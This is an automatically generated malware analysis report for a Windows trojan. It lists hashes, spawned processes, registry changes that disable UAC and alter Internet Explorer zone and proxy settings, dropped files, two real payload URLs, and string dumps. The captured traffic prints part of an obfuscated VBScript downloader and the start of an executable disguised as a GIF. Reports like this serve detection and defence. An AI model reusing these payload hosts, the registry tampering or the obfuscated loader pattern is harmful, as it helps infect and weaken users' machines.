Trojan.GenericKD.1950538_fc6542e338

by malwarelabrobot on November 7th, 2014 in Malware Descriptions.

Trojan.Win32.Vobfus.yzq (Kaspersky), Artemis!FC6542E3382C (McAfee), Downloader.Generic14.DXH (AVG), Trojan.GenericKD.1950538 (AdAware), Trojan.MSIL.Bladabindi.2.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: fc6542e3382c7fbd08c8770bdba9ff46
SHA1: d1f2ff09bcb5c21431989fa7995f2f16e4aa7449
SHA256: 18cd2d3ec57ba850fc847eed209f3cc2f30cd50d7e62777d910ca3752239e6d1
SSDeep: 6144:Vbhwr9IHvsq1FQnWc0BSjwtFDxxyVkIWFrBrh4lTi/0Q9Op9f22222222222222P:3q9QdQnmHPKVtWFrBlqTi/v9o9
Size: 387584 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPXv0896v102v105v122Delphistub, UPolyXv05_v6
Company: no certificate found
Created at: 2014-10-29 22:57:31
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

ping.exe:740
ping.exe:1700
ping.exe:372
ping.exe:204
ping.exe:596
ping.exe:1772
ping.exe:1724
ping.exe:1156
ping.exe:1308
ping.exe:1844
ping.exe:1252
ping.exe:644
ping.exe:1352
ping.exe:824
ping.exe:504
ping.exe:1516
ping.exe:500
wscript.exe:472

The Trojan injects its code into the following process(es):

%original file name%.exe:656

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
RasPbFile
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
ShimCacheMutex

File activity

The process %original file name%.exe:656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wg[1].gif (192769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\All Users\wg.gif (193177 bytes)
%Documents and Settings%\All Users\winSupport.vbs (21242 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\nmscrp[1].gif (20929 bytes)

Registry activity

The process ping.exe:740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 01 47 09 F5 1E A1 DF 6A 27 8F 02 6D E4 A4 1D"

The process ping.exe:1700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 15 A7 26 92 6E 46 54 B6 E8 08 F7 D4 17 AA C2"

The process ping.exe:372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 56 4C 6E 4B 66 2F 10 E8 84 45 A0 17 70 4E C5"

The process ping.exe:204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 F0 55 A1 10 67 1E 48 FE 62 DA 69 3D 97 4E 51"

The process ping.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 13 59 24 47 6C 23 8A C4 66 44 9B CB D2 2C 64"

The process ping.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 0C 73 FA DE 3D 73 19 A5 B9 B9 21 60 46 72 F1"

The process ping.exe:1724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 65 55 69 C8 1E 1C D5 C5 74 C5 E0 6F 86 2E B5"

The process ping.exe:1156 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 7A F7 E5 5B D8 1F DE 5D 13 51 78 E6 ED 2A CC"

The process ping.exe:1308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F A6 19 4A E2 15 C4 85 27 B9 1E C7 E3 47 99 2A"

The process ping.exe:1844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 77 D3 1E 49 0C 01 DD 1D AE 2C 0B C2 1C E2 3E"

The process ping.exe:1252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B C2 76 2D 6A 31 3C 45 A3 82 65 AF 9A C1 2B 8D"

The process ping.exe:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 4E D0 F0 41 6C A4 EB 49 15 1A F6 61 EC 3E B1"

The process ping.exe:1352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 1A E7 9E EC 6F F2 F9 C0 39 43 DA 2B 8C EC A7"

The process ping.exe:824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 C6 87 F6 3F CF 15 F3 78 3E 6B EB DC 17 19 A0"

The process ping.exe:504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 8B FA 4C E9 6D 23 AB 2B 13 27 90 4C 78 44 63"

The process ping.exe:1516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 44 52 6F EF 5D A6 A9 C3 C3 04 DE 66 F7 FC 43"

The process ping.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 88 12 F3 A4 69 D0 A5 83 5F E5 C9 F0 A9 4F 64"

The process %original file name%.exe:656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D A1 84 1B 83 F3 F8 BA A7 28 15 1E 2E C1 69 66"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process wscript.exe:472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 99 6E 18 BC 5A D9 CC 24 E0 45 43 6B 05 60 F8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"ping.exe" = "TCP/IP Ping Command"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"ConsentPromptBehaviorAdmin" = "0"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Dropped PE files

MD5 File path
bd126a7b59d5d1f97ba89a3e71425731 c:\Documents and Settings\All Users\wg.exe
bd126a7b59d5d1f97ba89a3e71425731 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wg[1].gif

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 1.0.0.0
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 692224 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 696320 360448 358400 5.49912 6f5865be7c63fde9e731913664a4d726
.rsrc 1056768 28672 28160 2.16278 7318a03e397bed08221620b5dd6d694d

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://an.babalucat.com/nmscrp.gif 146.0.79.195
hxxp://www.reformapolitica.org.br/plugins/docman/wg.gif 64.90.50.156


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /plugins/docman/wg.gif HTTP/1.1
User-Agent: hXXp://VVV.reformapolitica.org.br/plugins/docman/wg.gif
Host: VVV.reformapolitica.org.br


HTTP/1.1 200 OK
Date: Thu, 06 Nov 2014 10:21:49 GMT
Server: Apache
Last-Modified: Sat, 04 Oct 2014 03:20:41 GMT
ETag: "62000-5049055923440"
Accept-Ranges: bytes
Content-Length: 401408
Content-Type: image/gif
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.............w...w.
..w.......w.......w...x...w.G.7...w.G.k...w...*...w.>.*...w...v...w
...(.u.w...-...w.Rich..w.................PE..L......I.................
 ........................@............................................
.................................4....................................
......................................................................
.........UPX0....................................UPX1..... ...........
[email protected]................................@..............
......................................................................
......................................................................
.....................................................................$
Info: This file is packed with the UPX executable packer hXXp://upx.ts
x.org $..$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Right
s Reserved. $..UPX!......G<!...............&!.......L$.V.t$.;.u.3.^
........P.I........AF..t.:.t.1... .K...`c..WtG.|$...t?...~.b..$.....u.
Ou.XF..._...._...6...D...;.Vv..T....}..p.H;.t.#w.S_N.~...3.SU.n.......
..W.....,m.........l.......9....................i.m.=....E........F...
 .../X............._][..3...V......U.....%...y.H...@u%..}....dl._....0
.m..............~..k..._.E..L..k....N....($0Q.i...l$4.5(.....n... ....
.VW......4...........UP...O..@t*.E..E..E.U.....o;E.m.A..@.!...<%t./
.-..U Au&..._^]_,...[..(.A...9.A......%..THw...."@..$..!.........&
<<< skipped >>>


GET /nmscrp.gif HTTP/1.1
User-Agent: hXXp://an.babalucat.com/nmscrp.gif
Host: an.babalucat.com


HTTP/1.1 200 OK
Date: Thu, 06 Nov 2014 10:21:48 GMT
Server: Apache/2.2.27 (Unix) PHP/5.5.11
Last-Modified: Fri, 31 Oct 2014 20:02:51 GMT
ETag: "27f2c-a161-506bd7b54bea0"
Accept-Ranges: bytes
Content-Length: 41313
Content-Type: image/gif
Function RNKJ_RP(num)..RNKJ_RP = num ((8-6) (3-3) 277)..RNKJ_RP = RNKJ
_RP 1000-((4*2)*125)..RNKJ_RP = chr(RNKJ_RP)..End Function..dim fileff
fx,fileieeeex,valores..Set Px = CreateObject(RNKJ_RP(-279 87) & RNKJ_R
P(-279 83) & RNKJ_RP(-279 99) & RNKJ_RP(-279 114) & RNKJ_RP(-279 105) 
& RNKJ_RP(-279 112) & RNKJ_RP(-279 116) & RNKJ_RP(-279 46) & RNKJ_RP(-
279 83) & RNKJ_RP(-279 104) & RNKJ_RP(-279 101) & RNKJ_RP(-279 108) & 
RNKJ_RP(-279 108))..set SHL = CreateObject(RNKJ_RP(-279 83) & RNKJ_RP(
-279 104) & RNKJ_RP(-279 101) & RNKJ_RP(-279 108) & RNKJ_RP(-279 108) 
& RNKJ_RP(-279 46) & RNKJ_RP(-279 65) & RNKJ_RP(-279 112) & RNKJ_RP(-2
79 112) & RNKJ_RP(-279 108) & RNKJ_RP(-279 105) & RNKJ_RP(-279 99) & R
NKJ_RP(-279 97) & RNKJ_RP(-279 116) & RNKJ_RP(-279 105) & RNKJ_RP(-279
 111) & RNKJ_RP(-279 110))..ARCH = Px.ExpandEnvironmentStrings(RNKJ_RP
(-279 37) & RNKJ_RP(-279 80) & RNKJ_RP(-279 82) & RNKJ_RP(-279 79) & R
NKJ_RP(-279 67) & RNKJ_RP(-279 69) & RNKJ_RP(-279 83) & RNKJ_RP(-279 8
3) & RNKJ_RP(-279 79) & RNKJ_RP(-279 82) & RNKJ_RP(-279 95) & RNKJ_RP(
-279 65) & RNKJ_RP(-279 82) & RNKJ_RP(-279 67) & RNKJ_RP(-279 72) & RN
KJ_RP(-279 73) & RNKJ_RP(-279 84) & RNKJ_RP(-279 69) & RNKJ_RP(-279 67
) & RNKJ_RP(-279 84) & RNKJ_RP(-279 85) & RNKJ_RP(-279 82) & RNKJ_RP(-
279 69) & RNKJ_RP(-279 37))..NMPC = Px.ExpandEnvironmentStrings(RNKJ_R
P(-279 37) & RNKJ_RP(-279 99) & RNKJ_RP(-279 111) & RNKJ_RP(-279 109) 
& RNKJ_RP(-279 112) & RNKJ_RP(-279 117) & RNKJ_RP(-279 116) & RNKJ_RP(
-279 101) & RNKJ_RP(-279 114) & RNKJ_RP(-279 110) & RNKJ_RP(-279 9
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_656:

`.rsrc
biClrImportant
tagMSG
Windows
HKEY
TWMKey
KeyData
grfLocksSupported
ENoMonitorSupportException
.uvCOu
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
etNoMonitorSupportException
Operator
EVariantBadIndexError
EVariantBadIndexError<
ssShift
htKeyword
EInvalidOperation
EInvalidOperationhtB
TList.TDirection
AOperator
OnFindComponentClassH
TThread.TSynchronizeRecord
TOperation
Operation
FOnExecute
OnExecute\jB
Uh@%C
TList.Sort$ActRec
TComponent.FindComponent$ActRec4
TComponent.FindComponent$ActRec
HelpKeyword
UnderstandsKeyword
UhÝ
Uh.ED
TRegKeyInfo
NumSubKeys
MaxSubKeyLen
FCurrentKey
FRootKey
FCloseRootKey
CloseKey
CreateKey
DeleteKey
GetKeyInfo
GetKeyNames
HasSubKeys
KeyExists
LoadKey
MoveKey
OpenKey
OpenKeyReadOnly
ReplaceKey
RestoreKey
SaveKey
UnLoadKey
CurrentKey@
LastErrorMsg
RootKey@
RootKeyName
EInvalidGraphicOperation
EInvalidGraphicOperation(
SupportsPartialTransparency
SupportsClipboardFormat
Monochrome
poPortrait
APort
Port
FProportional
Proportional
FAutoHotkeys
RethinkHotkeys
AutoHotkeys
IsShortCut
AutoHotkeysX
igoParentPassthrough
FAlwaysShowDragImages
AlwaysShowDragImages
toFlickFallbackKeys
'TCustomGestureEngine.TGestureEngineFlag
(TCustomGestureEngine.TGestureEngineFlags
Supported
TKeyEvent
TKeyPressEvent
FHelpKeyword
FOnKeyDown
FOnKeyPress
FOnKeyUp
IsHintMsg
FNativeWheelSupport
FWheelSupportMessage
Uh.ZH
thHeaderItemLeftPressed
tsArrowBtnLeftPressed
ttbThumbLeftPressed
lrMonoChrome
ssHotTrack
TWindowState
poProportional
fsShowing
FWindowState
FKeyPreview
WantChildKey
KeyPreviewT
WindowState jI
KeyPreview
WindowState
OnKeyDown\
OnKeyPress
OnKeyUp
FBiDiKeyboard
FNonBiDiKeyboard
FEnumAllWindowsOnActivateHint
FOnActionExecute
Keyword
EnumAllWindowsOnActivateHint@
BiDiKeyboard@
NonBiDiKeyboard
OnActionExecute
UrlMon
user32.dll
uxtheme.dll
DWMAPI.DLL
windowscodecs.dll
KWindows
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
Picture.Data
WinExec
GetCPInfo
RegOpenKeyExW
RegCloseKey
RegUnLoadKeyW
RegSaveKeyW
RegRestoreKeyW
RegReplaceKeyW
RegQueryInfoKeyW
RegLoadKeyW
RegFlushKey
RegEnumKeyExW
RegDeleteKeyW
RegCreateKeyExW
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MapVirtualKeyW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextW
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
InternetOpenUrlW
.text
`.itext
`.data
.idata
.didata
.rdata
@.reloc
B.rsrc
zMsgA9
<v3:requestedExecutionLevel level="highestAvailable" />
KERNEL32.DLL
advapi32.dll
comctl32.dll
gdi32.dll
msimg32.dll
ole32.dll
oleaut32.dll
version.dll
wininet.dll
winspool.drv
kernel32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
%s[%d]
%s_%d
.Owner
USER32.DLL
\\?\UNC\
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
%s (*.%s)|*.%1:s
%s (%s)|%1:s|
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
clWebSnow
clWebFloralWhite
clWebLavenderBlush
clWebOldLace
clWebIvory
clWebCornSilk
clWebBeige
clWebAntiqueWhite
clWebWheat
clWebAliceBlue
clWebGhostWhite
clWebLavender
clWebSeashell
clWebLightYellow
clWebPapayaWhip
clWebNavajoWhite
clWebMoccasin
clWebBurlywood
clWebAzure
clWebMintcream
clWebHoneydew
clWebLinen
clWebLemonChiffon
clWebBlanchedAlmond
clWebBisque
clWebPeachPuff
clWebTan
clWebYellow
clWebDarkOrange
clWebRed
clWebDarkRed
clWebMaroon
clWebIndianRed
clWebSalmon
clWebCoral
clWebGold
clWebTomato
clWebCrimson
clWebBrown
clWebChocolate
clWebSandyBrown
clWebLightSalmon
clWebLightCoral
clWebOrange
clWebOrangeRed
clWebFirebrick
clWebSaddleBrown
clWebSienna
clWebPeru
clWebDarkSalmon
clWebRosyBrown
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebOlive
clWebForestGreen
clWebGreenYellow
clWebChartreuse
clWebLightGreen
clWebAquamarine
clWebSeaGreen
clWebGoldenRod
clWebKhaki
clWebOliveDrab
clWebGreen
clWebYellowGreen
clWebLawnGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkgreen
clWebLimeGreen
clWebLime
clWebSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebLightCyan
clWebLightBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebIndigo
clWebMediumTurquoise
clWebTurquoise
clWebCyan
clWebPowderBlue
clWebSkyBlue
clWebRoyalBlue
clWebMediumBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebCadetBlue
clWebDarkCyan
clWebTeal
clWebDeepskyBlue
clWebDodgerBlue
clWebBlue
clWebNavy
clWebDarkViolet
clWebDarkOrchid
clWebMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebMediumOrchid
clWebMediumPurple
clWebPurple
clWebDeepPink
clWebLightPink
clWebViolet
clWebOrchid
clWebPlum
clWebThistle
clWebHotPink
clWebPink
clWebLightSteelBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebWhite
clWebLightgrey
clWebGray
clWebSteelBlue
clWebSlateBlue
clWebSlateGray
clWebWhiteSmoke
clWebSilver
clWebDimGray
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlategray
clWebGainsboro
clWebDarkGray
clWebBlack
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
crSQLWait
%s (%s)
imm32.dll
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
\wg.gif
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.&Cannot change the size of a JPEG image
JPEG error #%d
All Clipboard does not support Icons Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form
OK Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex
Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)
Unsupported clipboard format
Error creating window class*Input buffer exceeded for %s = %d, %s = %d The specified file was not found$No help viewer that supports filters
Invalid Timeout value: %s#''%s'' is not a valid integer value#No context-sensitive help installed
No help found for %s
Failed to create key %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread'Parameter %s cannot be a negative value
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid file name - %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class
Error reading %s%s%s: %s
Invalid destination array"Character index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Interface not supported
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
1.0.0.0

%original file name%.exe_656_rwx_00401000_00100000:

biClrImportant
tagMSG
Windows
HKEY
TWMKey
KeyData
grfLocksSupported
ENoMonitorSupportException
.uvCOu
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
etNoMonitorSupportException
Operator
EVariantBadIndexError
EVariantBadIndexError<
ssShift
htKeyword
EInvalidOperation
EInvalidOperationhtB
TList.TDirection
AOperator
OnFindComponentClassH
TThread.TSynchronizeRecord
TOperation
Operation
FOnExecute
OnExecute\jB
Uh@%C
TList.Sort$ActRec
TComponent.FindComponent$ActRec4
TComponent.FindComponent$ActRec
HelpKeyword
UnderstandsKeyword
UhÝ
Uh.ED
TRegKeyInfo
NumSubKeys
MaxSubKeyLen
FCurrentKey
FRootKey
FCloseRootKey
CloseKey
CreateKey
DeleteKey
GetKeyInfo
GetKeyNames
HasSubKeys
KeyExists
LoadKey
MoveKey
OpenKey
OpenKeyReadOnly
ReplaceKey
RestoreKey
SaveKey
UnLoadKey
CurrentKey@
LastErrorMsg
RootKey@
RootKeyName
EInvalidGraphicOperation
EInvalidGraphicOperation(
SupportsPartialTransparency
SupportsClipboardFormat
Monochrome
poPortrait
APort
Port
FProportional
Proportional
FAutoHotkeys
RethinkHotkeys
AutoHotkeys
IsShortCut
AutoHotkeysX
igoParentPassthrough
FAlwaysShowDragImages
AlwaysShowDragImages
toFlickFallbackKeys
'TCustomGestureEngine.TGestureEngineFlag
(TCustomGestureEngine.TGestureEngineFlags
Supported
TKeyEvent
TKeyPressEvent
FHelpKeyword
FOnKeyDown
FOnKeyPress
FOnKeyUp
IsHintMsg
FNativeWheelSupport
FWheelSupportMessage
Uh.ZH
thHeaderItemLeftPressed
tsArrowBtnLeftPressed
ttbThumbLeftPressed
lrMonoChrome
ssHotTrack
TWindowState
poProportional
fsShowing
FWindowState
FKeyPreview
WantChildKey
KeyPreviewT
WindowState jI
KeyPreview
WindowState
OnKeyDown\
OnKeyPress
OnKeyUp
FBiDiKeyboard
FNonBiDiKeyboard
FEnumAllWindowsOnActivateHint
FOnActionExecute
Keyword
EnumAllWindowsOnActivateHint@
BiDiKeyboard@
NonBiDiKeyboard
OnActionExecute
UrlMon
user32.dll
uxtheme.dll
DWMAPI.DLL
windowscodecs.dll
KWindows
Font.Charset
Font.Color
Font.Height
Font.Name
